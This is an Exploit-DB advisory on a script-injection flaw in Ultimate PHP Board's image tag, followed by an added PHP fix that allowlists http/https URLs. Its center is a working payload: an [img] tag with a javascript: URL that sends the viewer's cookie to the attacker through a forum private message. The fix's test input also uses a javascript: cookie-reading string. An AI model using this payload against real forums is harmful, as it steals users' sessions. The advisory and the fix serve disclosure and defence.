Ultimate PHP Board 1.0/1.1 - Image Tag Script Injection

EDB-ID: 21423
CVE:
Author: frog
Type: webapps
Platform: PHP
Date: 2002-04-25

source: https://www.securityfocus.com/bid/4603/info

Ultimate PHP Board (UPB) is web forum software. It will run on most Unix and Linux variants, as well as Microsoft Windows operating systems.

Ultimate PHP Board does not filter script code from image tags. This may allow an attacker to include script code in forum messages. Injected script code will be executed in the browser of an arbitrary web user who views the malicious forum message, in the context of the website running UPB.

It may be possible to inject script code into other UPB-Code formatting tags, though this has not been confirmed. 

[ img]javascript:window.open(' index.php?upb=pm&mode=send&send=yes&target_id=SONPROPREID&betreff=cookie&pm=' +document.cookie+ ' &smilies=1&use_upbcode=1&pmbox_id=IDDELAVICTIME&check=yes ')[/img ]
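
One way to close the gap described above is to accept only http/https URLs inside image tags and escape everything else. This is an added example in PHP, not code from UPB; the function names `safe_img_url` and `render_img_tags` are hypothetical, and the sample posts are constructed.

```php
<?php
// Added example: a hypothetical [img] renderer, not code from UPB.

// Return the URL if it may be placed in <img src>, otherwise null.
function safe_img_url(string $raw): ?string
{
    $url = trim($raw);
    // Reject whitespace, control characters and HTML metacharacters outright.
    if ($url === '' || preg_match('/[\x00-\x20\x7f"\'<>`]/', $url)) {
        return null;
    }
    $parts = parse_url($url);
    if ($parts === false || empty($parts['scheme']) || empty($parts['host'])) {
        return null;
    }
    // Allowlist of schemes: anything else (javascript:, data:, ...) is refused.
    return in_array(strtolower($parts['scheme']), ['http', 'https'], true) ? $url : null;
}

function render_img_tags(string $post): string
{
    // Escape the whole post first so it cannot carry raw HTML.
    $html = htmlspecialchars($post, ENT_QUOTES, 'UTF-8');
    return preg_replace_callback(
        '/\[img\](.*?)\[\/img\]/is',
        function (array $m): string {
            $url = safe_img_url(htmlspecialchars_decode($m[1], ENT_QUOTES));
            if ($url === null) {
                return $m[0]; // rejected tag stays as inert, escaped text
            }
            return '<img src="' . htmlspecialchars($url, ENT_QUOTES, 'UTF-8') . '" alt="">';
        },
        $html
    );
}

// Constructed sample posts: one script URL, one ordinary image URL.
$posts = [
    "[img]javascript:alert(document.cookie)[/img]",
    "[img]https://example.com/a.png?x=1&y=2[/img]",
];
foreach ($posts as $p) {
    echo render_img_tags($p), PHP_EOL;
}
```

Because the check is an allowlist on the parsed scheme rather than a blocklist of the word "javascript", the same function can be reused for any other UPB-Code tag that takes a URL.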